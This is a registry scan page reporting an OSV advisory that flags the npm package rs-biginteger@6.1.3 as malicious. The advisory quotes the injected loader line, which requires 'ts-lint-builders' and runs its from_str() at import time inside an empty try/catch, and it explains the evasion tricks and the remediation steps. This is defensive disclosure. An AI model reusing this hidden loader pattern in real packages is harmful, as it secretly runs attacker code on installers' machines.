registry  /  rs-biginteger  /  6.1.3

rs-biginteger@6.1.3

OSV Malicious Advisory

scanned 3h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-6675 confirms this npm version as malicious. Package presents itself as a big-integer arithmetic library and ships the verbatim big.js v7.0.1 source plus its README. Injected between the `P.minus` and `P.mod` method definitions in both big.js and big.mjs is a loader: `try { const doc = require("ts-lint-builders"); doc.from_str().then(...) } catch (error) {}`...

Advisory
MAL-2026-6675
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in rs-biginteger (npm)
Details
Package presents itself as a big-integer arithmetic library and ships the verbatim big.js v7.0.1 source plus its README. Injected between the `P.minus` and `P.mod` method definitions in both big.js and big.mjs is a loader: `try { const doc = require("ts-lint-builders"); doc.from_str().then(...) } catch (error) {}`. On every `require('rs-biginteger')` / ESM import, the module top-level resolves `ts-lint-builders` and invokes its `from_str()` function, executing third-party code chosen by this author at load time. The package's declared dependency is `ts-lint-builders-v2.1@2.1.0` — a name mismatch with the require target, indicating the attacker controls the resolution path into the installer's dependency graph. The empty try/catch silently swallows any failure, concealing the behavior from casual inspection. The loader's placement mid-file inside cloned legitimate source, the cover-story package name impersonating big.js/big-integer, the duplicated payload in both CommonJS and ESM entry points, and the silent error swallowing are deliberate evasion patterns. Installers expecting a pure-math library instead load and execute arbitrary attacker-chosen code on every import. ## Source: ghsa-malware (c4c6d1869f82f8162a8219a520ad9e885e55e925ee006a503f657083120c78ee) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Decision reason
OpenSSF Malicious Packages via OSV confirms rs-biginteger@6.1.3 as malicious (MAL-2026-6675): Malicious code in rs-biginteger (npm)

Source & flagged code

0 flagged
No flagged code excerpts are attached to this scan.

Findings

1 High
HighOsv Malicious Advisory